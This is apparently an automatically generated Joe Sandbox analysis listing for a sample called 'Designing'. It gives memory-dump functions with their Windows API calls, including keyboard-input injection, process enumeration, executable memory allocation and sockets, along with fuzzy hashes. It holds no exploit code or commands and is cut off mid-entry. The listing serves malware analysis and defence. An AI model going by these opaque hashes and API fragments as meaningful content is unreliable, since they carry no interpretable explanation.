                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aac1768d4a6954f760a616209bc516115cceae93792d14258b52d14b3ed8c30b
                                              • Instruction ID: 1560e3629ceda9d77c6655d2dee6504f88ec5b39cec39a63f38388e3dc65d805
                                              • Opcode Fuzzy Hash: aac1768d4a6954f760a616209bc516115cceae93792d14258b52d14b3ed8c30b
                                              • Instruction Fuzzy Hash: 09C15B75A04216EFCB14EF94C884EAAB7F5FF48714B2185D8E805EB261DB31ED81CB90
                                              Function 00BAE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 00BAE7A7
                                              • CharLowerBuffW.USER32(?,?), ref: 00BAE7EA
                                                • Part of subcall function 00BADE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BADEAE
                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00BAE9EA
                                              • _memmove.LIBCMT ref: 00BAE9FD
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                              • String ID:
                                              • API String ID: 3659485706-0
                                              • Opcode ID: 5d3a385bbdf22dd4044c3eda2ec1bd675fd4fd2c6a918ec05dde5dced184320e
                                              • Instruction ID: 45bc16136307bfbe2d920ee1cc4bdc859b576c3c57267b9bc530860c464ae4a2
                                              • Opcode Fuzzy Hash: 5d3a385bbdf22dd4044c3eda2ec1bd675fd4fd2c6a918ec05dde5dced184320e
                                              • Instruction Fuzzy Hash: FDC11971A083019FC754DF28C480A6ABBE4FF89714F1489AEF8A99B351D731ED45CB92
                                              Function 00BA877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00BA87AD
                                              • CoUninitialize.OLE32 ref: 00BA87B8
                                                • Part of subcall function 00BBDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00BA8A0E,?,00000000), ref: 00BBDF71
                                              • VariantInit.OLEAUT32(?), ref: 00BA87C3
                                              • VariantClear.OLEAUT32(?), ref: 00BA8A94
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                              • String ID:
                                              • API String ID: 780911581-0
                                              • Opcode ID: bc706d431e2252e7efc44292da064a7442ef01c4e6cf97c07543458e6ead5b5d
                                              • Instruction ID: a0b6d0480beadc491ff8ce377b5656f1019d06ef0ea3d38a33b3ba0d088b4e59
                                              • Opcode Fuzzy Hash: bc706d431e2252e7efc44292da064a7442ef01c4e6cf97c07543458e6ead5b5d
                                              • Instruction Fuzzy Hash: 84A11575208B019FDB10EF54C481B2AB7E4BF89354F148899F99A9B7A1CB34FD44CB92
                                              Function 00B8814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                              Download Yara Rule
                                              APIs
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BC3C4C,?), ref: 00B88308
                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BC3C4C,?), ref: 00B88320
                                              • CLSIDFromProgID.OLE32(?,?,00000000,00BC0988,000000FF,?,00000000,00000800,00000000,?,00BC3C4C,?), ref: 00B88345
                                              • _memcmp.LIBCMT ref: 00B88366
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: cd7c35cc99e251b7218a5a632cab79d103b1b2625b3c2fc1c24724500e7f1ba8
                                              • Instruction ID: acbf06ba8347392f415d9b1fdbb6f7ecec9b701b178542529e34a573f8831644
                                              • Opcode Fuzzy Hash: cd7c35cc99e251b7218a5a632cab79d103b1b2625b3c2fc1c24724500e7f1ba8
                                              • Instruction Fuzzy Hash: 6F810971A00109EFCB04DF94C984EEEB7F9FF89315F208598E505AB260DB71AE06CB60
                                              Function 00B8749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$AllocClearCopyInitString
                                              • String ID:
                                              • API String ID: 2808897238-0
                                              • Opcode ID: be589c3c6874ecc642edcc5fcdd632a2cbb3198683bffac21e3231fa9de691df
                                              • Instruction ID: 94815510ab4e7599670ec45c8bf30254ba9f68a06961e9ddbd95889f6d9d7583
                                              • Opcode Fuzzy Hash: be589c3c6874ecc642edcc5fcdd632a2cbb3198683bffac21e3231fa9de691df
                                              • Instruction Fuzzy Hash: A9519430698B029ADB24BF799895A6DB3E5EF54318F30889FE546C72B1EE30D840CB15
                                              Function 00BAF4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00BAF526
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00BAF534
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00BAF5F4
                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00BAF603
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                              • String ID:
                                              • API String ID: 2576544623-0
                                              • Opcode ID: e299cab7febbe34621f4629c1c4407a1b3ffa465bb2247b1ece2dcace8e7f75e
                                              • Instruction ID: 03c65b7ef0c51c87dd70d78a2b1992b6ab40b4c03b09532781bab46e5c5a4b10
                                              • Opcode Fuzzy Hash: e299cab7febbe34621f4629c1c4407a1b3ffa465bb2247b1ece2dcace8e7f75e
                                              • Instruction Fuzzy Hash: 5151A071908301AFC310EF24DC86EABB7E8EF99700F10496DF595D7261EB70AA04CB92
                                              Function 00BB9E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00BB9E88
                                              • ScreenToClient.USER32(00000002,00000002), ref: 00BB9EBB
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00BB9F28
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: 25d6b487cce634bfc07a03c1ea57bac1543d2efc1fac557b6e89b4b3c0966e44
                                              • Instruction ID: 51ea042855623ce4d8580a6ebd9b1b011cc3d37ef474f2cfc00b2f7e2db922f8
                                              • Opcode Fuzzy Hash: 25d6b487cce634bfc07a03c1ea57bac1543d2efc1fac557b6e89b4b3c0966e44
                                              • Instruction Fuzzy Hash: 7851EA35A00209EFDB14DF54C8849BE7BF6EB44360F2086A9F955DB2A0DB71AD51CB90
                                              Function 00B5492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                              • String ID:
                                              • API String ID: 2782032738-0
                                              • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                              • Instruction ID: 7e698d1c86563b2f412c261e4a0391463ce496118bc640972cef98b8c4828b13
                                              • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                              • Instruction Fuzzy Hash: 5B41E6356007069FDF288E69C881BAF77E5EF4036AB2481FDEC5587640D7709DC98B44
                                              Function 00B8A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B8A68A
                                              • __itow.LIBCMT ref: 00B8A6BB
                                                • Part of subcall function 00B8A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B8A976
                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B8A724
                                              • __itow.LIBCMT ref: 00B8A77B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow
                                              • String ID:
                                              • API String ID: 3379773720-0
                                              • Opcode ID: 0376db59a31bb30873da81568fd77aadcde726b2b526c229476b894d98916743
                                              • Instruction ID: 9aed19f7dfe89f366928b92db478f6fa4235b43c0daf8abfb0142d6a6d8da1aa
                                              • Opcode Fuzzy Hash: 0376db59a31bb30873da81568fd77aadcde726b2b526c229476b894d98916743
                                              • Instruction Fuzzy Hash: 9E417374A00209ABEF11EF54CC45BEE7BF9EF44750F0404AAF905A3291DB709E85DBA2
                                              Function 00BA7095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00BA70BC
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA70CC
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BA7130
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA713C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorLast$__itow__swprintfsocket
                                              • String ID:
                                              • API String ID: 2214342067-0
                                              • Opcode ID: d9730b3e235e1d375f894664cde4bec19c2e5dc95bce8f76abb362d8889190da
                                              • Instruction ID: 0fdc047ecf4da77882a2294fb063ca119f567161dadd10df5638fa74693bbb97
                                              • Opcode Fuzzy Hash: d9730b3e235e1d375f894664cde4bec19c2e5dc95bce8f76abb362d8889190da
                                              • Instruction Fuzzy Hash: EC419175754200AFE724BF24DC86F6A77E4DB04B14F248498FA59AB3D2DB74AD008B91
                                              Function 00BA6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00BC0980), ref: 00BA6B92
                                              • _strlen.LIBCMT ref: 00BA6BC4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID:
                                              • API String ID: 4218353326-0
                                              • Opcode ID: 312a0ad2b2197f1f1178ac1d5c7da162eadd3a809a09f0f5566a1fe83ded494d
                                              • Instruction ID: 6656640f095857ae6dfe4b9be2e9dc6f894b017287b5145af08aa79b29353a6b
                                              • Opcode Fuzzy Hash: 312a0ad2b2197f1f1178ac1d5c7da162eadd3a809a09f0f5566a1fe83ded494d
                                              • Instruction Fuzzy Hash: C14171B1A04108ABCB14FB64DCD5FAEB3E9EF55310F1881D5F81A9B292EB30AE45C750
                                              Function 00B9BE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B9BEE1
                                              • GetLastError.KERNEL32(?,00000000), ref: 00B9BF07
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B9BF2C
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B9BF58
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: 565841fe721b4e5442d1193c1be765a8a7450ed27ded74e1629b78b1856e815b
                                              • Instruction ID: c9c9d06bc92de7b9c27d93466812ff5635166094501181ef40e435e3c9f5d701
                                              • Opcode Fuzzy Hash: 565841fe721b4e5442d1193c1be765a8a7450ed27ded74e1629b78b1856e815b
                                              • Instruction Fuzzy Hash: 9741E435600A10DFCB11EF15D585A59BBE1EF89320F1984E8E8499B362CB30FD42DB91
                                              Function 00BB8E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                              Download Yara Rule
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BB8F03
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: 2f5f6c324db4c7db16ae7ecebf438021fe972186e21b9a486dba03e35591517e
                                              • Instruction ID: 2485cd11828df1871b62a9f4d0eda1e52b766cf856cd0cf310d3210c6cd70f7c
                                              • Opcode Fuzzy Hash: 2f5f6c324db4c7db16ae7ecebf438021fe972186e21b9a486dba03e35591517e
                                              • Instruction Fuzzy Hash: 2A318C34654108EFEB209E18CC89FF837EAEB09320F244991FA51D72A1CFF1E950DA91
                                              Function 00BBB1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00BBB1D2
                                              • GetWindowRect.USER32(?,?), ref: 00BBB248
                                              • PtInRect.USER32(?,?,00BBC6BC), ref: 00BBB258
                                              • MessageBeep.USER32(00000000), ref: 00BBB2C9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: abc9aaf1056e580e6ba58f1b10d4ecf13f449f166db23eb7166d63e3de992810
                                              • Instruction ID: b5540b8b6cf7d70be4210dadecaf9be711730c8a8daf36e3384994c7221ddd19
                                              • Opcode Fuzzy Hash: abc9aaf1056e580e6ba58f1b10d4ecf13f449f166db23eb7166d63e3de992810
                                              • Instruction Fuzzy Hash: CA415A30A04119DFDF11CF99C884EBD7BF5FB49351F1481E9E8589B261DBB0A941CB50
                                              Function 00B912D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B91326
                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00B91342
                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B913A8
                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B913FA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: 0326800849d4d594d6cdf0f535cbff50a824e8f42b21a56fb1b89997ac83fab2
                                              • Instruction ID: c4a67dab893dc0b7fa6b0d42c8d4dfbb49c954a8275cef45755422ea3a3f5f3a
                                              • Opcode Fuzzy Hash: 0326800849d4d594d6cdf0f535cbff50a824e8f42b21a56fb1b89997ac83fab2
                                              • Instruction Fuzzy Hash: 1D314D30948209FEFF308A6D8C05BFD7BF9EB45320F0486BAE491526D1D3744D41AB59
                                              Function 00B91410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B91465
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B91481
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B914E0
                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B91532
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: cfe9ae209a1d840b02beaa4d2d0d4d98b5cf7b19ae513fd52cfbf0339c63889e
                                              • Instruction ID: 2dfb3387d99649214dfaecbecaf95accb95cd8e4aa6a405ccb3a200f8e6ba34b
                                              • Opcode Fuzzy Hash: cfe9ae209a1d840b02beaa4d2d0d4d98b5cf7b19ae513fd52cfbf0339c63889e
                                              • Instruction Fuzzy Hash: BD313B3094020A9EFF348A699C04BBABBE5EB9D310F0447AAE491523D1C3789951AF61
                                              Function 00B663F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B6642B
                                              • __isleadbyte_l.LIBCMT ref: 00B66459
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B66487
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B664BD
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: 05e0c9d692694b61eca64c79df6c87835b3731dcaa62c55c5b758ea245221b2b
                                              • Instruction ID: deb67445bb8a83b587a63d703cd81e45c723dc98a6e8f6fcee806b669258af78
